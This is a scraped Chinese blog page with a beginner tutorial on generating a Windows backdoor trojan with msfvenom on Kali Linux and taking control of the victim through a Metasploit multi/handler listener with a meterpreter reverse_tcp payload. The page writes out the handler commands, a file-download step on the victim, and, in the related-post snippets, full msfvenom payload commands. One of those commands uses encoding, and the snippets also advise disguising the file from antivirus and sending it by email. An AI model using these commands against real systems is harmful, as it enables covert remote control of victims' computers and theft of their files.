kali Linux生成Windows后门

转载 已于 2023-12-11 17:07:23 修改 · 1k 阅读 · 4 ·
CC 4.0 BY-SA版权
原文链接:https://blog.youkuaiyun.com/weixin_42514162/article/details/109438059?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165078165116781683936269%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=165078165116781683936269&b
文章标签:

#linux #运维 #服务器

于 2022-04-24 14:29:32 首次发布
这篇教程介绍了如何利用Kali Linux中的msfvenom工具生成Windows木马后门,并通过msfconsole进行操控。首先,通过`msfvenom -l payloads`查看可用模块,然后用`msfvenom`命令生成shell.exe木马,设置lhost和lport为目标IP和监听端口。接着,将木马复制到目标Windows系统但不执行。在Kali中,启动msfconsole,使用`use exploit/multi/handler`,设置payload为`windows/meterpreter/reverse_tcp`,lhost和lport与之前一致。最后,执行木马,即可在Kali上控制受害机器,执行各种命令,如文件下载等。

 

教程开始:

Kali是一个强大系统,有很多的工具可以用来进行渗透。今天,介绍自己的初始的一个新手木马。

  • 首先,查看一下工具msfvenom的功能参数吧。
  • msfvenom

     查看功能模块

  • msfvenom -l payloads

  •  然后,使用工具msfvenom来生成后门木马,这个是专业的创建木马后门的工具。命令如下:

  • 生成了木马shell.exe,顺便一提lhost(localhost)和lport要设置为你的IP和你打算使用的端口。

  • 之后,把木马复制到另一台受害的机器,Windows系统中,但是先别执行,在kali中继续输入,如下代码:
  • msfconsole

    之后,输入

  • msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.79.3
lhost => 192.168.79.3
msf5 exploit(multi/handler) > set lport 2333
lport => 2333
msf5 exploit(multi/handler) > exploit

    好了,执行Windows下的木马。结果如下

  •  可以随意操作这个Windows的文件。比如使用,下载功能,

  • download test.txt

     输入?,查看更多命令

KM_
关注
kali的学习笔记篇(七)metasploit之PC后门
Kind&红衣的博客
08-12 1226
//生成后门 //参数可参照第五篇文章:PC渗透参数集 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.113 LPORT=55555 -f exe > /root/muma.exe //选择模块 use exploit/multi/handler //装载攻击载...
kalilinux - msf后门木马植入与远程监听
weixin_74923758的博客
01-14 879
在真实的攻击中,对方不一定是win7有永恒之蓝漏洞的版本。所以在真实的攻击中我们要生成远控木马。本节我们要讲的是。
里应外合:Linux下的后门和日志工具(ZT)
tianyu的专栏 - Linux site:blog.youkuaiyun.com/wishfly
03-04 1442
攻入Linux系统后,很多入侵者往往就开始得意忘形了。这其中还有一个原因,就是技术性也要求更高了。下面,我们来看看一些常用的经典工具。  1、从这里延伸:后门和连接工具  (1)Httptunnel  Tunnel的意思是隧道,通常HTTPTunnel被称之为HTTP暗道,它的原理就是将数据伪装成HTTP的数据形式来穿过防火墙,实际上,它是在HTTP请求中创建了一个双向的虚拟数据连接来穿透防火墙。
kali生成web端后门
weixin_34397291的博客
12-07 906
  很多时候在***测试时选择web***害怕用的别人的马带有后门,这样自己的辛苦就要被别人不劳而获,很多时候我们都想拥有自己的马,那么这个时候你就应该使用kail来生成一个自己独特密码的web***了。 Kali Linux自带有好几个web***生成工具,下面我们来简单看几个:1.webacoo后门webacoo  -g -o test.php-g 制作后门代码-o 输出生成指定的后门程序文件...
Linux学习之Kali制作简单的Windows的木马,创建后门
weixin_42514162的博客
11-01 6561
Kali是一个强大系统,有很多的工具可以用来进行渗透。今天,介绍自己的初始的一个新手木马。 首先,查看一下工具msfvenom的功能参数吧。 msfvenom 查看功能模块(超级多,要等一会,哈哈) msfvenom -l payloads 然后,使用工具msfvenom来生成后门木马,这个是专业的创建木马后门的工具。命令如下: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.79.3 lport=2333 -f exe &
Kali 2.0 Web后门工具----WebaCoo、weevely、PHP Meterpreter
weixin_30814223的博客
11-10 722
注:以下内容仅供学习使用,其他行为均与作者无关!转载请注明出处,谢谢! 本文将介绍 Kali 2.0 版本下的三款Web后门工具:WebaCoo、weevely、PHP Meterpreter,这类工具通常用于维护控制权。 实验环境: ● KALI 的IP地址是192.168.44.138; ● Metasploit的IP地址是192.168.44.130 ; 一、 WeBaCoo WeBaCoo...
Kali LinuxWindows7 x64 植入后门
m0_50917178的博客
04-11 2132
声明:本文章内所有内容环境为自己搭建绝无违法内容,禁止利用其中的技术来做违法的事情。 主要内容: **1.利用msf生成后门,并上传到目标主机上 2.介绍获得权限可以做的某些事情 3.查看并提高现有权限 4.创建账户,并将其加入管理组 5.开启远程桌面** 第一步:利用msf生成后门,并上传到目标主机上 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.16.128 lport=5555 -f exe -o /home/rockrock
渗透工具——kali中msf(后门生成模块msfvenom)
2301_78006725的博客
09-02 1099
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木马时,木马会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木马没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell
Kali实现msfvenom在WindowsLinux靶机下后门漏洞
weixin_43287317的博客
03-28 6228
Kali实现msfvenom在WindowsLinux靶机下后门漏洞
Kali Linux渗透测试小实践——Metasploit与后门木马
PICACHU+++的博客
01-08 3271
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
25000Linux集群完整版去后门生成.rar
10-11
25000Linux集群完整版去后门生成
Kali linux渗透测试系列————32、Kali linux 维持访问之操作系统后门
Fly_鹏程万里
05-16 2480
操作系统后门简单来说,所谓后门(backdoor),就是绕过目标系统安全控制体系的正规用户认证过程而维持我们队目标系统的控制权,以及隐匿我们控制行为的方法。CymothoaCymothoa是一款可以将ShellCode注入到现有进程(插入进程)的后门工具。借助这种注入手段,它能够把ShellCode伪装成常规程序。他说注入的后门程序应当能够与贝注入的程序(进程)共存,以避免被管理或维护人员怀疑。将...
kali生成后门远程控制电脑或手机
wutiangui的博客
05-07 4568
问题:Metasploit渗透测试中出的错误 Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).点击.exe文件直接运行安装,运行,下一步,直接完成安装。Android模拟器(靶机1):192.168.0.106。2.1首先从官网上下载模拟器雷电地址点击打开链接。靶机:192.168.25.106。二、环境配置二Android模拟器。
Kali渗透测试-远程控制:6200端口变成“后门
Bruce_xiaowei的博客
05-06 3456
Kali渗透测试-远程控制:6200端口变成“后门” 测试环境 攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248) 靶机:Metasploitable2 - Linux (IP:192.168.68.205) 攻击工具:Netcat(nc) “瑞士军刀” 扫描工具:Nmap version 7.92 漏洞是黑客进入计算机的入口,如果目标主机上运行的vsftpd-2.3.4被黑客使用笑脸漏洞成功渗透,就会自动在6200
Kali Linux之常见后门工具介绍
weixin_34061042的博客
02-26 2028
1、Meterpreter 它是Metasploit框架中功能强大的后渗透模块。可以通过Meterpreter的客户端执行攻击脚本,远程调用目标主机上运行的Meterpreter服务端。 命令        作用 sessions     查看会话ID信息 idletime     显示目标主机截止当前无操作命令的时间 webcam_snap  抓取目标主机的摄像头,将拍摄的内容保存...
linux 系统使用 cymothoa 添加后门
发哥微课堂
01-27 3138
0x00:介绍 cymothoa 是一个后门工具,利用代码 shellcode 会被注入到进程中,只要进程存在,后门就会有效,所以一般选择一些自其服务的进程来注入,例如 web 服务 mysql,apache 等。其后门所拥有的权限和注入的进程权限是相同的。当拿下目标 shell 后就可以使用 cymothoa 添加后门了。 0x01:使用 首先已经有了一个机器的 shell,我这里是 me...
利用msfvenom生产windows后门
shy的博客
11-05 2183
原理: 利用msfvenom制作shy .exe 文件,然后发送到靶机上面,运行后就可以在kali linux 上面利用msfconsole连接msfvenom服务控制靶机 1,根据靶机操作系统,搜索适合的生产后门文件的脚本 msfvenom -l | grep windows | grep x64 | grep tcp 2,选择生产脚本,生产后门文件 -p 选择一个payloa...
Kali利用metasploit 生成后门程序,操作目标主机cmd
qq_19641369的博客
11-27 5118
.利用命令生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe LHOST:表示本机地址 -f :表示生成程序的后缀 met:文件名 可以自定义 把生成exe文件发送给目标主机执行,注意记得伪装下否则会被杀毒软件识别,我这里是利用打包命令将其打包,然后发送到目标主机执行。 二.msfconsole 命令打开控制台 root@...
后门
蓝法典的专栏
02-28 1249
Mix老装一幅正人君子的样子,说写文档,哼哼。。。。无聊,cmd /?后看见好多东西,其中有个好玩的: ******************* 如果 /D 未在命令行上被指定,当 CMD.EXE 开始时,它会寻找 以下 REG_SZ/REG_EXPAND_SZ 注册表变量。如果其中一个或 两个都存在,这两个变量会先被执行。 HKEY_LOCAL_MACHINE/Software/Microsoft
kail生成windows后门
最新发布
06-21
生成后门文件后,需要配置Metasploit以接收来自目标系统的连接。以下是具体步骤: 1. 启动Metasploit控制台: ```bash msfconsole ``` 2. 加载多平台处理器模块: ```bash use exploit/multi/handler ``` 3. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值